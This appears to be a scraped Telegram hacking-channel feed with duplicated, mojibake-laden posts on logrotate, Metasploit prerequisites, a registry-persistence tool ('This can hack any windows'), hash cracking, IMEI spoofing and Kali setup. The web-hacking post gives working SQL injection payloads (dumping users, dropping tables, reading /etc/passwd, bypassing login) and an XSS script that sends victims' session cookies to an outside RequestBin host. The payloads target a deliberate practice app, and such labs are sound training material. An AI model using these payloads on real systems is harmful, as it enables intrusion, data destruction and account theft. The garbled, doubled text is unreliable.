β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦π§ How to set up and manage log rotation using Logrotate on Linux:
A) Installing Logrotate on Linux
To install logrotate just use your package manager:
---------- On Debian and Ubuntu ----------
# aptitude update && aptitude install logrotate
---------- On CentOS, RHEL and Fedora ----------
# yum update && yum install logrotate
B) It is worth noting that the configuration file (/etc/logrotate.conf) may indicate that other, more specific settings can be placed in separate .conf files inside /etc/logrotate.d.
This will be the case if and only if the following line exists and is not commented out:
include /etc/logrotate.d
C) We will stick to this approach as it will help us keep things tidy and will use the Debian box for the following examples.
Configuring Logrotate on Linux
D) As a very versatile tool, logrotate provides many directives to help us customize when and how the logs will be rotated, and what should happen immediately afterwards.
Let's paste the following content into /etc/logrotate.d/apache2.conf (note that you will most likely need to create this file) and examine each line.
/ var / log / apache2 / * {
weekly
rotate 3
size 10M
compress
delaycompress
}
E) The first line indicates that the directives inside the block apply to all logs inside / var / log / apache2:
weekly means the tool will try to update the logs on a weekly basis. Other possible values ββare daily and monthly.
rotate 3 indicates that only 3 rotations should be left. Thus, the oldest file will be deleted on the fourth subsequent run.
size = 10M sets the minimum size for rotation to 10M. In other words, each log will not rotate until it reaches 10MB.
compress and delaycompress are used to specify that all but the most recent logs being processed should be compressed.
Let's do a dry run to see what logrotate would do if it were actually executed now.
Use the -d option followed by the config file (you can run logrotate by omitting this option):
# logrotate -d /etc/logrotate.d/apache2.conf
F) Instead of compressing the logs, we could rename them according to the date they were edited.
G) To do this, we'll use the dateext directive.
If our date format is different from the default yyyymmdd, we can specify it using dateformat.
Note that we can even prevent rotation if the log is empty using notifempty.
Also, let's tell logrotate to send the updated log to the system administrator (in this case admin@mydomain.com) for his reference (this will require setting up a mail server, which is beyond the scope of this article).
H) This time we will only use /etc/logrotate.d/squid.conf for the /var/log/squid/access.log route:/var/log/squid/access.log {
monthly
create 0644 root root
rotate 5
size = 1M
dateext
dateformat -% d% m% Y
notifempty
mail admin@mydomain.com
}
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦π§ How to set up and manage log rotation using Logrotate on Linux:
A) Installing Logrotate on Linux
To install logrotate just use your package manager:
---------- On Debian and Ubuntu ----------
# aptitude update && aptitude install logrotate
---------- On CentOS, RHEL and Fedora ----------
# yum update && yum install logrotate
B) It is worth noting that the configuration file (/etc/logrotate.conf) may indicate that other, more specific settings can be placed in separate .conf files inside /etc/logrotate.d.
This will be the case if and only if the following line exists and is not commented out:
include /etc/logrotate.d
C) We will stick to this approach as it will help us keep things tidy and will use the Debian box for the following examples.
Configuring Logrotate on Linux
D) As a very versatile tool, logrotate provides many directives to help us customize when and how the logs will be rotated, and what should happen immediately afterwards.
Let's paste the following content into /etc/logrotate.d/apache2.conf (note that you will most likely need to create this file) and examine each line.
/ var / log / apache2 / * {
weekly
rotate 3
size 10M
compress
delaycompress
}
E) The first line indicates that the directives inside the block apply to all logs inside / var / log / apache2:
weekly means the tool will try to update the logs on a weekly basis. Other possible values ββare daily and monthly.
rotate 3 indicates that only 3 rotations should be left. Thus, the oldest file will be deleted on the fourth subsequent run.
size = 10M sets the minimum size for rotation to 10M. In other words, each log will not rotate until it reaches 10MB.
compress and delaycompress are used to specify that all but the most recent logs being processed should be compressed.
Let's do a dry run to see what logrotate would do if it were actually executed now.
Use the -d option followed by the config file (you can run logrotate by omitting this option):
# logrotate -d /etc/logrotate.d/apache2.conf
F) Instead of compressing the logs, we could rename them according to the date they were edited.
G) To do this, we'll use the dateext directive.
If our date format is different from the default yyyymmdd, we can specify it using dateformat.
Note that we can even prevent rotation if the log is empty using notifempty.
Also, let's tell logrotate to send the updated log to the system administrator (in this case admin@mydomain.com) for his reference (this will require setting up a mail server, which is beyond the scope of this article).
H) This time we will only use /etc/logrotate.d/squid.conf for the /var/log/squid/access.log route:/var/log/squid/access.log {
monthly
create 0644 root root
rotate 5
size = 1M
dateext
dateformat -% d% m% Y
notifempty
mail admin@mydomain.com
}
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦How to Use The Mac OS X Hackers Toolbox :
Before we install Metasploit, we need to install some software dependencies. It is a little more work to install Metasploit on Mac OS X, but it will be worth it. Listed below are the prerequisite software packages.
π¦Software Prerequisites
MacPorts
Ruby1.9.3
Homebrew
PostgreSQL
π»π΄π 'π π π π°π π :
1) MacPorts Installation Install Xcode
Xcode Install from the Apple App Store, or it can be downloaded from the following URL: https://developer.apple.com/xcode/
Once Xcode is installed, go into the Xcode preferences and install the βCommand Line Toolsβ.
2) Install the MacPorts app
3) Download and install the package file (.dmg) file from the MacPorts web site: https://distfiles.macports.org/MacPorts/
Once the files are downloaded, install MacPorts. More information on MacPorts can be found here: http://www.macports.org/install.php
4) Run MacPorts selfupdate to make sure it is using the latest version.
5) From a terminal window run the following command:
$ sudo port selfupdate
6) Ruby 1.9.3
Mac OS X is preinstalled with Ruby, but we want to upgrade to Ruby 1.9.3
We will be using MacPorts to upgrade Ruby. From a terminal window run the following command:
$ sudo port install ruby19 +nosuffix
7) The default Ruby install path for MacPorts is: /opt/local/ Itβs a good idea to verify that the PATH is correct, so that opt/local/bin is listed before /usr/bin. You should get back something that looks like this:
/opt/local/bin:/opt/local/sbin:/usr/bin:/bin:/usr/ sbin:/sbin
8) You can verify the path by entering the following syntax in a terminal window:
$ echo $PATH
9) To verify the Ruby install locations, enter this syntax:
$ which ruby gem
You should get back the following response:
/opt/local/bin/ruby /opt/local/bin/gem
Now ready to install hacking tools such metasploit and more ...
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦How to Use The Mac OS X Hackers Toolbox :
Before we install Metasploit, we need to install some software dependencies. It is a little more work to install Metasploit on Mac OS X, but it will be worth it. Listed below are the prerequisite software packages.
π¦Software Prerequisites
MacPorts
Ruby1.9.3
Homebrew
PostgreSQL
π»π΄π 'π π π π°π π :
1) MacPorts Installation Install Xcode
Xcode Install from the Apple App Store, or it can be downloaded from the following URL: https://developer.apple.com/xcode/
Once Xcode is installed, go into the Xcode preferences and install the βCommand Line Toolsβ.
2) Install the MacPorts app
3) Download and install the package file (.dmg) file from the MacPorts web site: https://distfiles.macports.org/MacPorts/
Once the files are downloaded, install MacPorts. More information on MacPorts can be found here: http://www.macports.org/install.php
4) Run MacPorts selfupdate to make sure it is using the latest version.
5) From a terminal window run the following command:
$ sudo port selfupdate
6) Ruby 1.9.3
Mac OS X is preinstalled with Ruby, but we want to upgrade to Ruby 1.9.3
We will be using MacPorts to upgrade Ruby. From a terminal window run the following command:
$ sudo port install ruby19 +nosuffix
7) The default Ruby install path for MacPorts is: /opt/local/ Itβs a good idea to verify that the PATH is correct, so that opt/local/bin is listed before /usr/bin. You should get back something that looks like this:
/opt/local/bin:/opt/local/sbin:/usr/bin:/bin:/usr/ sbin:/sbin
8) You can verify the path by entering the following syntax in a terminal window:
$ echo $PATH
9) To verify the Ruby install locations, enter this syntax:
$ which ruby gem
You should get back the following response:
/opt/local/bin/ruby /opt/local/bin/gem
Now ready to install hacking tools such metasploit and more ...
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
Apple Developer
Xcode - Apple Developer
Xcode includes everything you need to develop, test, and distribute apps across all Apple platforms.
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
Multiple GitLab security vulnerabilities could allow hackers to exploit logins and more.
#Vulnerabilities
#Vulnerabilities
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦BEST HTML AND CSS EDITORS FOR WINDOWS:
https://atom.io/
https://notepad-plus-plus.org/
https://www.sublimetext.com/
https://clk.tradedoubler.com/click?p=264355&a=3118363&g=24531572
https://code.visualstudio.com/#meet-intellisense
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦BEST HTML AND CSS EDITORS FOR WINDOWS:
https://atom.io/
https://notepad-plus-plus.org/
https://www.sublimetext.com/
https://clk.tradedoubler.com/click?p=264355&a=3118363&g=24531572
https://code.visualstudio.com/#meet-intellisense
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
The GitHub Blog
Sunsetting Atom
We are archiving Atom and all projects under the Atom organization for an official sunset on December 15, 2022.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦This can hack any windows
π¦ SharpHide: a tool to create hidden registry keys
1) Malware that runs without elevated privileges in Windows has limited ability to recover from a system reboot (called persistence).
Malware that elevates privileges using zero-day exploits or public exploits has more potential to persist.
However, zero days are expensive and risk exposing them, and public exploits will not work on patched systems.
2) Most malware gets stuck using well known save methods that are easy to detect.
The easiest save method is to write the value to HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Run (or a
similar key to HKEY_LOCAL_MACHINE).
3) The values ββfor this key are commands that Windows executes when the user logs on (in the case of HKEY_CURRENT_USER) or when it boots (in the case of HKEY_LOCAL_MACHINE).
The malicious program writes the path to its executable file into the Run key.
4) So it restores execution after reboot.
Since this is a well-known method, the suspicious value in the Run key is a red flag indicating that the system is infected.
It also reveals the location of malware on the system, making it very easy to collect samples for analysis.
5) FILE-FREE BINARY STORAGE
CONVENTIONAL STORAGE OF FILES ON DISK
Antivirus software scans files on the disk.
Antivirus software hashes files and sends signatures to the cloud.
Some antiviruses perform heuristic scans of files stored on the disk.
6) Suspected malware files can even be silently sent to the cloud.
To counter this, malware has several options.
Files on disk can be regular droppers that access the Internet and load more essential modules (which are loaded into memory without touching the disk).
Malicious programs can also create executable files that are stored on disk so as not to disable antivirus heuristics.
π¦For example, because antivirus often scans high-entropy segments in PE (which indicate compressed or encrypted data), malware can avoid using encryption and compression to protect its executable files.
Since the antivirus has heuristics that scans the import tables, malware can avoid importing suspicious functions.
Such countermeasures are burdensome for malware developers and, in any case, do not guarantee that their binaries will not be uploaded to the cloud.
Download && Use
https://github.com/outflanknl/SharpHide#usage
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦This can hack any windows
π¦ SharpHide: a tool to create hidden registry keys
1) Malware that runs without elevated privileges in Windows has limited ability to recover from a system reboot (called persistence).
Malware that elevates privileges using zero-day exploits or public exploits has more potential to persist.
However, zero days are expensive and risk exposing them, and public exploits will not work on patched systems.
2) Most malware gets stuck using well known save methods that are easy to detect.
The easiest save method is to write the value to HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Run (or a
similar key to HKEY_LOCAL_MACHINE).
3) The values ββfor this key are commands that Windows executes when the user logs on (in the case of HKEY_CURRENT_USER) or when it boots (in the case of HKEY_LOCAL_MACHINE).
The malicious program writes the path to its executable file into the Run key.
4) So it restores execution after reboot.
Since this is a well-known method, the suspicious value in the Run key is a red flag indicating that the system is infected.
It also reveals the location of malware on the system, making it very easy to collect samples for analysis.
5) FILE-FREE BINARY STORAGE
CONVENTIONAL STORAGE OF FILES ON DISK
Antivirus software scans files on the disk.
Antivirus software hashes files and sends signatures to the cloud.
Some antiviruses perform heuristic scans of files stored on the disk.
6) Suspected malware files can even be silently sent to the cloud.
To counter this, malware has several options.
Files on disk can be regular droppers that access the Internet and load more essential modules (which are loaded into memory without touching the disk).
Malicious programs can also create executable files that are stored on disk so as not to disable antivirus heuristics.
π¦For example, because antivirus often scans high-entropy segments in PE (which indicate compressed or encrypted data), malware can avoid using encryption and compression to protect its executable files.
Since the antivirus has heuristics that scans the import tables, malware can avoid importing suspicious functions.
Such countermeasures are burdensome for malware developers and, in any case, do not guarantee that their binaries will not be uploaded to the cloud.
Download && Use
https://github.com/outflanknl/SharpHide#usage
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - outflanknl/SharpHide: Tool to create hidden registry keys.
Tool to create hidden registry keys. Contribute to outflanknl/SharpHide development by creating an account on GitHub.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦what is Browser hijacking ?
1) is a form of unwanted software that modifies a web browser's settings without a user's permission, to inject unwanted advertising into the user's browser. A browser hijacker may replace the existing home page, error page, or search engine with its own.
2) These are generally used to force hits to a particular website, increasing its advertising revenue.
3) Some browser hijackers also contain spyware, for example, some install a software keylogger to gather information such as banking and e-mail authentication details. Some browser hijackers can also damage the registry on Windows systems, often permanently.
Some browser hijacking can be easily reversed, while other instances may be difficult to reverse. Various software packages exist to prevent such modification.
4) Many browser hijacking programs are included in software bundles that the user did not choose, and are included as "offers" in the installer for another program, often included with no uninstall instructions, or documentation on what they do, and are presented in a way that is designed to be confusing for the average user, in order to trick them into installing unwanted extra software.
5) There are several methods that browser hijackers use to gain entry to an operating system. Email attachments and files downloaded through suspicious websites and torrents are common tactics that browser hijackers use.
wiki
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦what is Browser hijacking ?
1) is a form of unwanted software that modifies a web browser's settings without a user's permission, to inject unwanted advertising into the user's browser. A browser hijacker may replace the existing home page, error page, or search engine with its own.
2) These are generally used to force hits to a particular website, increasing its advertising revenue.
3) Some browser hijackers also contain spyware, for example, some install a software keylogger to gather information such as banking and e-mail authentication details. Some browser hijackers can also damage the registry on Windows systems, often permanently.
Some browser hijacking can be easily reversed, while other instances may be difficult to reverse. Various software packages exist to prevent such modification.
4) Many browser hijacking programs are included in software bundles that the user did not choose, and are included as "offers" in the installer for another program, often included with no uninstall instructions, or documentation on what they do, and are presented in a way that is designed to be confusing for the average user, in order to trick them into installing unwanted extra software.
5) There are several methods that browser hijackers use to gain entry to an operating system. Email attachments and files downloaded through suspicious websites and torrents are common tactics that browser hijackers use.
wiki
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Web Hacking:
SQL Injection
XSS (Cross-Site Scripting)
Session Hijacking
1) git clone https://github.com/lambdacasserole/hack-this
2) cd hack-this
3) npm install
This will install Bower which will allow you to install the assets the website requires (Bootstrap, jQuery etc.) using the command:
4) bower install
Gulp will also have been installed. This will compile the Less and CoffeeScript into CSS and JS ready for production. Do this using the command:
gulp
This command will need running again every time you make a change to a Less file. If you're working on them, run gulp watch in a terminal to watch for file changes and compile accordingly.
5) Setup
To set everything up, you'll need to:
Import the file db.sql into your database
6) Modify the file db_configuration.php to correspond to your database
Access the site and get hacking
π¦EXAMPLES:
1) SQL Injection
In an SQL injection attack, malicious SQL statements are inserted into an entry field for execution (usually in a data-driven web application).
Get information for all users:
http://localhost/customers.php?username=leocadio'%20or%20'1'='1
http://localhost/customers.php?username=leocadio'%20or%20''='
http://localhost/customers.php?id=1%20or%201=1
Drop (destroy) invoices table:
http://localhost/customers.php?id=1;drop%20table%20invoices
Dump the password hash file from the server:
Unix: http://localhost/customers.php?username='%20UNION%20SELECT%201,1,1,1,LOAD_FILE('/etc/passwd'),'1
Dump several things at once (oh boy):
http://localhost/customers.php?username='%20UNION%20SELECT%201,2,3,4,5,'hello%20world
Bypass Login (SQL Injection)
It's possible to bypass login completely (logging in as whoever you like) by adding an always-true condition to the password check:
foo' or '1'='1
2) Session Hijacking (XSS)
Using a service like RequestBin it's possible to hijack user sessions by capturing their session cookie. Try sending a message to a user consisting of the following code (with {{ bin_id }} substituted out for your RequestBin bin ID).
<script>
var xmlHttp = new XMLHttpRequest();
xmlHttp.open("GET", "http://requestbin.fullcontact.com/{{ bin_id }}?c=" + document.cookie, false);
xmlHttp.send(null);
</script>
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Web Hacking:
SQL Injection
XSS (Cross-Site Scripting)
Session Hijacking
1) git clone https://github.com/lambdacasserole/hack-this
2) cd hack-this
3) npm install
This will install Bower which will allow you to install the assets the website requires (Bootstrap, jQuery etc.) using the command:
4) bower install
Gulp will also have been installed. This will compile the Less and CoffeeScript into CSS and JS ready for production. Do this using the command:
gulp
This command will need running again every time you make a change to a Less file. If you're working on them, run gulp watch in a terminal to watch for file changes and compile accordingly.
5) Setup
To set everything up, you'll need to:
Import the file db.sql into your database
6) Modify the file db_configuration.php to correspond to your database
Access the site and get hacking
π¦EXAMPLES:
1) SQL Injection
In an SQL injection attack, malicious SQL statements are inserted into an entry field for execution (usually in a data-driven web application).
Get information for all users:
http://localhost/customers.php?username=leocadio'%20or%20'1'='1
http://localhost/customers.php?username=leocadio'%20or%20''='
http://localhost/customers.php?id=1%20or%201=1
Drop (destroy) invoices table:
http://localhost/customers.php?id=1;drop%20table%20invoices
Dump the password hash file from the server:
Unix: http://localhost/customers.php?username='%20UNION%20SELECT%201,1,1,1,LOAD_FILE('/etc/passwd'),'1
Dump several things at once (oh boy):
http://localhost/customers.php?username='%20UNION%20SELECT%201,2,3,4,5,'hello%20world
Bypass Login (SQL Injection)
It's possible to bypass login completely (logging in as whoever you like) by adding an always-true condition to the password check:
foo' or '1'='1
2) Session Hijacking (XSS)
Using a service like RequestBin it's possible to hijack user sessions by capturing their session cookie. Try sending a message to a user consisting of the following code (with {{ bin_id }} substituted out for your RequestBin bin ID).
<script>
var xmlHttp = new XMLHttpRequest();
xmlHttp.open("GET", "http://requestbin.fullcontact.com/{{ bin_id }}?c=" + document.cookie, false);
xmlHttp.send(null);
</script>
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - lambdacasserole/hack-this: A collection of common web programming security mistakes.
A collection of common web programming security mistakes. - GitHub - lambdacasserole/hack-this: A collection of common web programming security mistakes.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ANOTHER GOOD HASH CRACKING:
F E A T U R E S :
auto detect hash
supports windows and linux platforms
fast decrypt
list of supported hashes:
- md4
- md5
- sha1
- sha224
- sha256
- sha384
- sha512
- ripemd160
- whirlpool
- mysql 3.2.3
- mysql 4.1
- mssql2000
- mssql2005
- nthash
- lmhash
- ntlm hash
π»π΄π 'π π π π°π π :
$ apt update upgrade
$ apt install python2 git
$ git clone https://github.com/ciku370/hasher
$ cd hasher
$ python2 hash.py
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ANOTHER GOOD HASH CRACKING:
F E A T U R E S :
auto detect hash
supports windows and linux platforms
fast decrypt
list of supported hashes:
- md4
- md5
- sha1
- sha224
- sha256
- sha384
- sha512
- ripemd160
- whirlpool
- mysql 3.2.3
- mysql 4.1
- mssql2000
- mssql2005
- nthash
- lmhash
- ntlm hash
π»π΄π 'π π π π°π π :
$ apt update upgrade
$ apt install python2 git
$ git clone https://github.com/ciku370/hasher
$ cd hasher
$ python2 hash.py
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - jsonluca/hasher: Hash cracker with auto detect hash
Hash cracker with auto detect hash. Contribute to jsonluca/hasher development by creating an account on GitHub.
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Anonymous on Android, since nothing anonymous 100% some tips will help for android users:
(not emulators)
1) Disabling GPS and Location settings
2) Disabling pre-installed apps/ bloatware
You can disable these apps by going to Settings > Apps. On Android 5.0 or lower, you may need to swipe to βALLβ tab to see your system apps while on the higher Android version you can do so by tapping on the 3 dot menu on top right of your screen. Select the app you want to disable and then press the βDisableβ button to disable it completely.
3) Disabling all Google stock applications
Just like Manufacturer apps you also get tons of pre-installed Google apps which hardly come in use any day. They occupy your system space, blocks your RAM memory, and also collects user data while running in the background.
4) Disabling Google keyboard permissions
5) you need root & fake imei & mac adress
6) Replacing some default Android Apps
Now, since we have opted out of all the Google services, we need an alternative for PlStoreore, Maps, Mail and so. Hence here we have compiled a list of all the privacy oriented apps that can be easily used as a replacement for the early ones.
7) install tor browser for using it
8) configure some good proxies
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Anonymous on Android, since nothing anonymous 100% some tips will help for android users:
(not emulators)
1) Disabling GPS and Location settings
2) Disabling pre-installed apps/ bloatware
You can disable these apps by going to Settings > Apps. On Android 5.0 or lower, you may need to swipe to βALLβ tab to see your system apps while on the higher Android version you can do so by tapping on the 3 dot menu on top right of your screen. Select the app you want to disable and then press the βDisableβ button to disable it completely.
3) Disabling all Google stock applications
Just like Manufacturer apps you also get tons of pre-installed Google apps which hardly come in use any day. They occupy your system space, blocks your RAM memory, and also collects user data while running in the background.
4) Disabling Google keyboard permissions
5) you need root & fake imei & mac adress
6) Replacing some default Android Apps
Now, since we have opted out of all the Google services, we need an alternative for PlStoreore, Maps, Mail and so. Hence here we have compiled a list of all the privacy oriented apps that can be easily used as a replacement for the early ones.
7) install tor browser for using it
8) configure some good proxies
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦why you should//Features of installing Kali Linux on a memory card :
Installing to a USB stick is similar to installing to an internal drive. But in order not to accidentally damage the main computer system, computer hard drives or the bootloader of the main system, I suggest installing Kali Linux on a USB flash drive in a virtual computer. After completing this installation, you will be able to boot from this flash drive in your real computer. I am using VirtualBox as my virtual computer .
There are two images available on the Kali Linux download page:
1) Installer - installation
2) Live - ISO from which you can download and work. You can also install from this image
3) In my method, I need a Live image to clean up a USB flash drive. But when installing from Live, there is no way to choose which components to install. In addition, the installation is done over the network. In general, we need two images at once: Installer (for installation) and Live to clean the flash drive.
I assume that you already have VirtualBox installed, or you yourself know how to install it.
4) In VirtualBox, create a new virtual machine. The most common virtual computer for Linux. The only difference is that it shouldn't have a (virtual) hard drive. If you have difficulty creating a virtual machine in VirtualBox, or have difficulties with other questions related to VirtualBox, then refer to the instructions " How to install Kali Linux (step by step instructions) ", there it is detailed and illustrated with screenshots.
5) configure some good proxies
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦why you should//Features of installing Kali Linux on a memory card :
Installing to a USB stick is similar to installing to an internal drive. But in order not to accidentally damage the main computer system, computer hard drives or the bootloader of the main system, I suggest installing Kali Linux on a USB flash drive in a virtual computer. After completing this installation, you will be able to boot from this flash drive in your real computer. I am using VirtualBox as my virtual computer .
There are two images available on the Kali Linux download page:
1) Installer - installation
2) Live - ISO from which you can download and work. You can also install from this image
3) In my method, I need a Live image to clean up a USB flash drive. But when installing from Live, there is no way to choose which components to install. In addition, the installation is done over the network. In general, we need two images at once: Installer (for installation) and Live to clean the flash drive.
I assume that you already have VirtualBox installed, or you yourself know how to install it.
4) In VirtualBox, create a new virtual machine. The most common virtual computer for Linux. The only difference is that it shouldn't have a (virtual) hard drive. If you have difficulty creating a virtual machine in VirtualBox, or have difficulties with other questions related to VirtualBox, then refer to the instructions " How to install Kali Linux (step by step instructions) ", there it is detailed and illustrated with screenshots.
5) configure some good proxies
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
New Critical Vulnerability in Red Hat Enterprise Could allow attacker to crash the system.
#Vulnerabilities
#Vulnerabilities
